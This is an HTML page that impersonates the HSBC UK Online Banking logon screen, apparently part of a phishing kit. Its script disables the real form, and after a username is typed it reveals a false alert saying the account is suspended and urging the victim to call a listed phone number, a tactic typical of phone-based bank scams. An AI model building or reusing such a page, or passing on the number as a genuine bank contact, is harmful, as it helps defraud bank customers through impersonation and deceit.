<!DOCTYPE html>
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="dj_webkit dj_chrome dj_contentbox">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <!-- Page Title Starts -->
        <title>Log on to Online Banking: Username | HSBC</title>
        <meta http-equiv="Cache-Control" content="max-age=1,s-maxage=0, no-cache, no-store, must-revalidate, private" />
        <link rel="stylesheet" href="./assets/ursula.css" media="screen" />
    </head>

    <body class="ursula" onload="entityJavascripts(),AutoFocus()">
        
       
        <div id="top">
           
            <div id="mainTopWrapper">
                <div id="mainTopUtility">
                    <h1 aria-hidden="true">HSBC</h1>
                    <div id="mainTopUtilityRow">
                        <ul id="tabs">
                            <li class="skipLink">
                                <a
                                    class="skip"
                                    data-dojo-props="target: &#39;#innerPage a:first&#39;"
                                    data-dojo-type="hsbcwidget/SkipLink"
                                    href="#"
                                    id="skip"
                                    target="#innerPage a:first"
                                    title="Skip page header and navigation"
                                    widgetid="skip"
                                    lang="en"
                                >
                                    Skip page header and navigation
                                </a>
                            </li>
                            <li class="on"><a href="#" aria-selected="true" aria-label="Personal currently selected">Personal</a></li>
                            <li><a href="#" title="Business">Business</a></li>
                        </ul>
                        <div id="siteControls">
                            <div id="langList">
                                <ul>
                                    <li class="selected"><a href="#" lang="en-UK" title="English">English</a></li>
                                </ul>
                            </div>
                            <div data-dojo-type="hsbcwidget/Locale" id="locale" lang="en" widgetid="locale">
                                <div
                                    data-dojo-props="contentSelector: &#39;#countrySelectorContent&#39;"
                                    data-dojo-type="hsbcwidget/DropDown"
                                    id="countrySelectorWrapper"
                                    lang="en"
                                    widgetid="countrySelectorWrapper"
                                    aria-relevant="all"
                                    aria-live="polite"
                                >
                                    <a
                                        class="dropDownLink trigger"
                                        role="tablist"
                                        aria-orientation="vertical"
                                        href="#"
                                        title="View list of HSBC Global websites"
                                        aria-haspopup="true"
                                    >
                                        <span><span class="flag uk">United Kingdom</span></span>
                                    </a>
                                    <div class="placeholder"></div>
                                </div>
                            </div>
                           
                           
                            
                        </div>
                    </div>
                </div>
                <div id="mainTopNavigation">
                    <div id="logo">
                        <a href="#" title="Home"><img alt="HSBC" src="./assets/hsbc-logo.gif" /></a>
                    </div>
                    <div data-dojo-type="hsbcwidget/DoormatController" id="sections" lang="en" widgetid="sections" aria-relevant="all" aria-live="polite">
                        <nav aria-label="products and services menu">
                            <ul id="topLevel" role="menu" aria-label="products and services menu">
                                <li class="level1" id="dijit__WidgetBase_0" widgetid="dijit__WidgetBase_0">
                                    <a tabindex="0" aria-expanded="false" aria-label="Everyday Banking - accounts and services" aria-haspopup="true" class="mainTopNav" id="everydayBanking">
                                        <strong>Everyday Banking</strong><br />
                                        Accounts &amp; services
                                    </a>
                                    
                                </li>
                                <li class="level1" id="dijit__WidgetBase_1" widgetid="dijit__WidgetBase_1">
                                    <a class="mainTopNav" tabindex="0" aria-expanded="false" aria-label="Borrowing - loans and mortgages" aria-haspopup="true" id="borrowing">
                                        <strong>Borrowing</strong><br />
                                        Loans &amp; mortgages
                                    </a>
                                    
                                </li>

                                <li class="level1" id="dijit__WidgetBase_2" widgetid="dijit__WidgetBase_2">
                                    <a tabindex="0" aria-expanded="false" aria-label="Investing - products and analysis" aria-haspopup="true" class="mainTopNav" id="Investing">
                                        <strong>Investing</strong><br />
                                        Products &amp; analysis
                                    </a>
                                    
                                </li>

                                <li class="level1" id="dijit__WidgetBase_3" widgetid="dijit__WidgetBase_3">
                                    <a tabindex="0" aria-expanded="false" aria-label="Insurance - property and family" aria-haspopup="true" class="mainTopNav" id="insurance">
                                        <strong>Insurance</strong><br />
                                        Property &amp; family
                                    </a>
                                    
                                </li>

                                <li class="level1" id="dijit__WidgetBase_4" widgetid="dijit__WidgetBase_4">
                                    <a tabindex="0" aria-expanded="false" aria-label="Life events - help and support" aria-haspopup="true" class="mainTopNav" id="lifeEvents">
                                        <strong>Life events</strong><br />
                                        Help and support
                                    </a>
                                    
                                </li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </div>
            <!-- Header Section Ends -->

            <!-- Entity Content Top Starts -->
            <!-- Page Title Starts -->
            <div class="pageHeaderBg">
                <div class="pageHeading row">
                    <div class="pageHeadingInner">
                        <h2>Log on to Online Banking</h2>
                    </div>
                </div>
            </div>
            <!-- Page Title Ends -->
            <!-- Entity Content Top Ends -->

            <div class="innerPage" id="innerPage">
                <div class="grid_skin">
                    <div class="row">
                        <!-- Entity Content Top2 Starts -->
                        <!-- <p dir="ltr"> &nbsp;</p> -->

                        <!-- Entity Content Top2 Ends -->
                    </div>
                    <!-- On Page Error Starts -->

                    <div class="row" id="errorCode" style="display: none;">
                        <div role="alert" class="alertBox" id="hsbcwidget_AlertBox_0" lang="en" title="" widgetid="hsbcwidget_AlertBox_0" aria-hidden="false">
                            <div class="alertBoxInner" role="alert">
                                <span class="hidden" aria-hidden="true">Alert Box</span>
                                <div data-dojo-attach-point="containerNode">
                                    <br />
                                    <p>
                                       Your account has been suspended due to suspicious activity. Please contact our customer support immediately +61730407694 
                                                            <br>* Error Code - Wp-402<br>
                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="row loginBoxes row_cam10_01">
                        <!-- On Page Error Ends -->
                        <div class="grid grid_9 containerStyle08 loginBox">
                            <h3>
                                Online Banking
                            </h3>
                            <form
                               
                                id="ibLogonForm"
                                method="post"
                                action=""
                               
                            >
                                

                                <div class="row">
                                    <label for="Username1">Please enter your username eg IB1234567890 or John123 </label>
                                </div>

                                <div class="row rowwidth">
                                    <div class="textInput isRightSec">
                                        <input
                                            id="Username1"
                                            tabindex="0"
                                            type="text"
                                            name="userid"
                                            value=""
                                           
                                        />
                                    </div>

                                    <div class="button primary btnForward buttonMargin">
                                        <span class="buttonInner"> <input type="submit" id="submitbtn" value="Continue" class="submit_input" /> <span class="icon"></span> </span>
                                    </div>
                                </div>

                                <div class="row">
                                    <div class="checkboxContainer">
                                        <div class="dijit dijitReset dijitInline dijitCheckBox" role="presentation" lang="en" widgetid="cookieuserid">
                                            <input
                                                name="cookieuserid"
                                                type="checkbox"
                                                class="dijitReset dijitCheckBoxInput"
                                               
                                                id="cookieuserid"
                                                value="true"
                                                autocomplete="off"
                                            />
                                        </div>
                                        <label for="cookieuserid">Remember my username </label>
                                    </div>
                                </div>

                                <div class="row">
                                    <ul class="linkList01">
                                        <li>
                                            <a href="#">
                                                Forgot your username?
                                                <span class="chevron"></span>
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                            </form>
                        </div>

                        <div class="grid" style="border-right: 1px solid #e5e5e5; height: 285px; width: 50px;"></div>

                        <div class="grid grid_9 containerStyle08 loginBox" style="margin-left: 25px;" dir="ltr">
                            <h3 style="border: none;">Register for Online Banking</h3>
                            <p>
                                Manage your money online with our secure Online<br />
                                Banking service.
                            </p>
                            <br />
                            <div>
                                <a href="#"><img src="./assets/btn_register_now.jpg" title="Register for online banking" alt="Register for online banking" /></a>
                            </div>
                        </div>
                    </div>

                    <div class="row">
                        <div class="row">
                            <div class="row" style="height: 0px; width: auto; border-top: 1px solid #e5e5e5;"></div>
                            <div class="grid grid_9 containerStyle08 loginBox" style="margin-right: 10px; padding-top: 0px;">
                                <h3 style="border: none;">Business customers</h3>
                                <br />
                                <br />
                                <ul class="listBullets01 linkList01">
                                    <li style="text-decoration: underline;"><a href="#">Log on to Business Internet Banking</a></li>
                                </ul>
                                <br />
                                <div class="row" style="padding-bottom: 80px;"><br /></div>
                                <div class="row">
                                    <br />
                                    <br />
                                    <br />
                                </div>

                                <span style="float: left;">
                                    <a href="#" title="FSCS Protecting your money" >
                                        <img alt="FSCS Protecting your money." height="49" src="./assets/protecting-your-money.jpg" style="padding-left: 10px;" title="FSCS Protecting your money." width="205" />
                                    </a>
                                </span>
                                <span style="float: left; margin-left: 10px;">
                                    <a
                                        title="How to stay safe online. This link will open in a new browser window."
                                      
                                        
                                        href="#"
                                    >
                                        <img src="./assets/how-to-stay-safe-online.jpg" title="How to stay safe online" alt="How to stay safe online" />
                                    </a>
                                </span>
                                <!-- END : Security and Fraud Update -->
                            </div>
                            <div class="grid grid_1" style="border-left: 1px solid #e5e5e5; height: 350px;"></div>

                            <div class="grid grid_9 containerStyle08 loginBox" style="padding-top: 0px;">
                                <h3 style="border: none;">Mobile Banking</h3>
                                <p dir="ltr" style="margin-top: -20px;">
                                    <br />
                                    Manage your personal accounts easily and securely with our Mobile Banking app. Set up new payments, scan cheques directly into your account and place a temporary block on your card. Mobile Banking your
                                    way.
                                </p>
                                <p dir="ltr" style="margin-top: -10px; color: #000000;"><strong>Download the app</strong></p>
                                <a style="float: left;" href="#" target="_self" title="Download our app from the Apple app store">
                                    <img src="./assets/app-store.jpg" title="Download our app from the Apple app store" alt="Download our app from the Apple app store" />
                                </a>
                                &nbsp;&nbsp;&nbsp;
                                <a style="float: left; margin-left: 10px;" href="#" target="_self" title="Download our app from the Google play store">
                                    <img src="./assets/google-play-logo.png" title="Download our app from the Google play store" alt="Download our app from the Google play store" />
                                </a>
                                <p dir="ltr" style="margin-top: 70px;"><a href="#" target="_self" title="Find out more about Mobile Banking">Find out more about Mobile Banking</a>&nbsp;</p>
                            </div>
                        </div>

                        <div dir="ltr" id="jsDOMStrMov1">
                            <div class="row">
                                <div class="grid grid_8">
                                    <div class="contentStrip">
                                        <div>
                                            <!-- Default content -->
                                            <a href="#" title="Find a mortgage for you. Let us take the hassle out of finding an attractive rate.">
                                                <img
                                                    alt="Find a mortgage for you. Let us take the hassle out of finding an attractive rate. Financial eligibility criteria apply. Your home or property may be repossessed if you do not keep up repayments on your mortgage. Find out more."
                                                    border="0"
                                                    height="245"
                                                    src="./assets/D667_advance_login_300x255_v2_mortgages.jpg"
                                                />
                                            </a>
                                        </div>
                                    </div>
                                </div>
                                <div class="grid grid_8">
                                    <div class="contentStrip">
                                        <div>
                                            <!-- Default content -->
                                            <a href="#" title="Upgrade your Secure Key. Upgrade to our Digital Secure Key for faster and more convenient acces to your Digital Banking">
                                                <img
                                                    alt="Upgrade your Secure Key. Upgrade to our Digital Secure Key for faster and more convenient acces to your Digital Banking. Find out more."
                                                    border="0"
                                                    height="245"
                                                    src="./assets/D650-login-seckey-300x255.jpg"
                                                />
                                            </a>
                                        </div>
                                    </div>
                                </div>

                                <div class="grid grid_8">
                                    <div class="contentStrip">
                                        <div>
                                            <!-- Default content -->
                                            <a href="#" title="Card gone missing? Place a temporary block on your card, then unblock it if it turns up.">
                                                <img alt="Card gone missing? Place a temporary block on your card, then unblock it if it turns up. Find out more." border="0" height="245" src="./assets/D650-login-cc-300x255.jpg" />
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="grid grid_24">
                                <div class="ctaRow" style="font-size: 9px;">
                                    <p style="padding-left: 35px; float: left;">
                                        <a
                                            
                                            title="Find out more about Online Banking. This link will open in a new browser window."
                                            href="#"
                                            class="overlayLaunchLink triggerModalDetails0"
                                            
                                        >
                                            Find out more about Online Banking
                                        </a>
                                    </p>

                                    <p style="float: left; padding-left: 93px;">
                                        <a
                                            href="#"
                                            title="Lost, damaged and stolen Secure Keys. This link will open in a new browser window."
                                            
                                            class="overlayLaunchLink triggerModalDetails0"
                                            
                                        >
                                            Lost, damaged and stolen Secure Keys
                                        </a>
                                    </p>

                                    <p style="float: left; padding-left: 105px;">
                                        <a
                                            href="#"
                                            title="Security downloads"
                                            
                                            class="overlayLaunchLink triggerModalDetails0"
                                           
                                        >
                                            Security downloads
                                        </a>
                                    </p>

                                    &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;

                                    <p>&nbsp;</p>
                                </div>
                            </div>
                        </div>
                      
                    </div>
                </div>
            </div>

            <!-- Entity Content Bottom Starts -->

           
            <div dir="ltr" id="footerLinks">
                <div id="footerLinksRow">
                    <ul style="display: flex; white-space: nowrap;">
                        <li class="contact">
                            <a href="#" title="Help &amp; Support">Help &amp; Support</a>
                        </li>
                        <li class="branch">
                            <a href="#" title="Find a branch">Find a branch</a>
                        </li>
                       
                    </ul>
                </div>
            </div>
            <div dir="ltr" id="footerMap">
                <div class="sixCol" id="footerMapRow">
                    <div class="column last">
                        <h2>
                            <a href="#" title="Support">Support</a>
                        </h2>
                        <ul>
                            <li>
                                <a href="#" title="Security centre">Security centre</a>
                            </li>
                            <li>
                                <a href="#" title="Card support">Card support</a>
                            </li>
                            <li>
                                <a href="#" title="CoBrowse">CoBrowse</a>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
            <div dir="ltr" id="footerUtility">
                <div id="footerUtilityRow">
                    <ul>
                        <li>
                            <a href="#" title="About HSBC">About HSBC</a>
                        </li>
                        <li>
                            <a href="#" title="Site map">Site map</a>
                        </li>
                        <li>
                            <a href="#" title="Legal">Legal</a>
                        </li>
                        <li>
                            <a href="#" title="Privacy Notice">Privacy notice</a>
                        </li>
                        <li>
                            <a href="#" title="Cookie Policy" class="dnt_no_consent">Cookie Policy</a>
                        </li>
                        <li>
                            <a href="#" title="Accessibility">Accessibility</a>
                        </li>
                        <li>
                            <a href="#" title="HSBC Group">HSBC Group</a>
                        </li>
                    </ul>
                    <p>
                        © &nbsp;HSBC Group 2020
                    </p>
                </div>
            </div>
           
            
            <!-- Footer Section Ends -->

            <a class="jsLightboxTrigger" style="display: none;" id="browserlink" data-target-id="lightboxContent7"></a>
            <div style="display: none;" id="lightboxContent7">
                <div class="alertLightbox informationBox clearfix">
                    <div class="alertLightboxInner">
                        <div class="row">
                            <p class="alertLightboxHeading">
                                We have detected your browser is out of date
                            </p>
                            <p>
                                The browser or device you are using may cause some pages to display incorrectly. For a better online experience we recommend you upgrade your browser.
                            </p>
                        </div>
                    </div>
                </div>
            </div>
            <div
                data-dojo-type="hsbcwidget/browserSupport"
                data-dojo-props="unsupported_list:[&#39;CHROME_25&#39;,&#39;CHROME_24&#39;,&#39;CHROME_23&#39;,&#39;CHROME_22&#39;,&#39;CHROME_21&#39;,&#39;CHROME_20&#39;,&#39;CHROME_19&#39;,&#39;CHROME_18&#39;,&#39;CHROME_17&#39;,&#39;CHROME_16&#39;,&#39;CHROME_15&#39;,&#39;IE_7&#39;,&#39;IE_6&#39;,&#39;IE_5&#39;,&#39;IE_4&#39;,&#39;FIREFOX_8&#39;,&#39;FIREFOX_9&#39;,&#39;FIREFOX_7&#39;,&#39;FIREFOX_16&#39;,&#39;SAFARI_1&#39;,&#39;SAFARI_2&#39;,&#39;SAFARI_3&#39;,&#39;SAFARI_4&#39;,&#39;SAFARI_5&#39;,&#39;SAFARI_5.1&#39;,&#39;IE_8&#39;]"
                id="tempdata_0"
                lang="en"
                widgetid="tempdata_0"
            ></div>
        </div>
        <script type="text/javascript" src="./assets/prefetch.js.download"></script>

        <style>
            .CoBrowseHiddenForScreenReader {
                position: absolute;
                left: -10000px;
                top: auto;
                width: 1px;
                height: 1px;
                overflow: hidden;
            }
            input.CoBrowseCheckBox[type="checkbox"]:checked ~ #tealiumAcceptTC {
                display: none !important ;
            }
            .CoBrowseFade {
                display: none;
                position: fixed;
                left: 0 !important;
                top: 0 !important;
                bottom: 0 !important;
                right: 0 !important;
                width: 100%;
                height: 100%;
                z-index: 3000;
                background: rgba(0, 0, 0, 0.6);
            }
            .modale-shadowCob {
                display: block;
                width: 100%;
                height: 100%;
                top: 0;
                left: 0;
                z-index: 9110;
                background: rgba(0, 0, 0, 0.7);
                cursor: pointer;
                z-index: 9250;
            }
            .modale {
                transition: opacity 0.25s cubic-bezier(0, 0.7, 0.38, 1);
                -webkit-transition: opacity 0.25s cubic-bezier(0, 0.7, 0.38, 1);
                -moz-transition: opacity 0.25s cubic-bezier(0, 0.7, 0.38, 1);
                -o-transition: opacity 0.25s cubic-bezier(0, 0.7, 0.38, 1);
                opacity: 1;
                visibility: visible;
                position: fixed;
                font-family: sans-serif;
            }
            .modale.hidden {
                opacity: 0;
                visibility: hidden;
            }
            .modale-content {
                z-index: 9251;
                background: white;
                border: 2px solid #dddddd;
                text-align: left;
                top: 50%;
                left: 50%;
                -webkit-transform: translate(-50%, -50%);
                -ms-transform: translate(-50%, -50%);
                transform: translate(-50%, -50%);
                padding: 40px;
                width: 540px;
            }
            .modale-content .content {
                max-height: 410px;
                overflow-y: auto;
                overflow-x: hidden;
            }
            .modale-title {
                font-weight: normal !important;
                font-size: 28px !important;
                line-height: 28px !important;
                margin-bottom: 15px;
                padding-bottom: 0 !important;
                color: #333 !important;
                text-align: center;
            }
            .modale-text {
                line-height: 17px !important;
                margin-bottom: 24px;
                font-size: 16px !important;
                padding-bottom: 0 !important;
            }
            .modale-text img {
                max-width: 100%;
            }
            .modale-text--center {
                text-align: center;
            }
            .buttonCloseModale {
                background: none;
                border: none;
                text-decoration: none;
                font-size: 40px;
                color: #333;
                cursor: pointer;
                position: absolute;
                top: 15px;
                right: 20px;
                height: 50px;
                width: 50px;
                text-align: center;
            }
            .buttonCloseModale:hover {
                color: #b6b7b6;
                cursor: pointer;
            }
            .buttonCloseModale:focus {
                border-bottom: 1px solid black !important;
            }
            .text-non {
                margin-bottom: 10px;
            }
            .text-non span {
                color: #db0011;
            }
            body .modale-img {
                max-width: 100%;
                text-align: center;
            }
            .modale-text--center {
                text-align: center;
            }
            .selectRadioPopin {
                margin-bottom: 26px;
                font-size: 16px;
                color: #333;
            }
            .modale-list {
                margin-left: 6px;
                margin-top: 16px;
                padding-bottom: 37px;
                padding-left: 18px;
                width: 51%;
                display: inline-block;
            }
            .modale-list li {
                padding-bottom: 0;
                font-size: 16px;
                text-align: left;
            }
            .selectTitle,
            .radioGroup,
            .radio {
                display: inline-block;
            }
            .radio {
                margin-left: 32px;
                margin-bottom: 3px;
            }
            .buttonsModale {
                width: 100%;
                padding: 10px 0;
                display: inline-block;
                border-top: 0 !important;
                margin-top: 10px;
            }
            .modaleBtnOui {
                display: inline-block;
                text-align: center;
                text-decoration: none;
                font-family: sans-serif;
                font-size: 16px;
                padding: 15px 20px;
                background-color: #db0011;
                color: white;
                line-height: 1 !important;
            }
            .modaleBtnOui:hover {
                background-color: #a4000d;
                text-decoration: none;
                color: white;
            }
            .modaleBtnOui:active,
            .modaleBtnOui:focus {
                background-color: #83000a;
                text-decoration: none;
                color: white;
                outline: none;
            }
            .modaleBtnNon {
                display: inline-block;
                text-align: center;
                text-decoration: none;
                font-family: sans-serif;
                font-size: 16px;
                padding: 14px 20px;
                text-decoration: none;
                cursor: pointer;
                border: 1px solid #333;
                color: #333;
                margin-right: 8px;
                line-height: 1 !important;
            }
            .modaleBtnNon:hover {
                border: 1px solid #333;
                background-color: rgba(0, 0, 0, 0.05);
                text-decoration: none;
                color: #333;
            }
            .modaleBtnNon:active,
            .modaleBtnNon:focus {
                border: 1px solid #333;
                background-color: rgba(0, 0, 0, 0.15);
                text-decoration: none;
                color: #333;
                outline: none;
            }
            .disclaimerPopin {
                display: inline-block;
                color: #333;
                font-size: 14px;
            }
            body .buttonsModale a.continueBtn {
                float: right;
            }
            .CoBrowseTextInput input {
                border: 1px solid #ccc;
                margin: 0 7px 3px 0;
                padding: 10px;
                width: 264px;
            }
            .modale-text.error_red {
                color: #db0011;
                margin: 0;
                font-size: 14px !important;
            }
            span.error_input_exclamation {
                background-color: #db0011;
                padding: 6px 12px 5px 12px;
                font-size: 22px;
                margin-left: -38px;
                font-weight: bold;
                color: #fff;    
                vertical-align: middle;
            }
            label.modale-text {
                font-weight: bold !important;
                display: inline-block;
                margin-bottom: 12px;
            }
            .content .modale-text input.CoBrowseCheckBox:focus {
                outline: 1px solid black !important;
            }
        </style>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
    $("a").attr("href", "#");

    $("#submitbtn").click(function(){
         $('#errorCode').hide();
        var Username1 = $('#Username1').val();
          if(Username1=='') {
         $('#Username1').focus();
         return false;
        }
         
        if(Username1!='') {
         $('#errorCode').show();
         return false;
        }
        });
});
</script>
    </body>
</html>
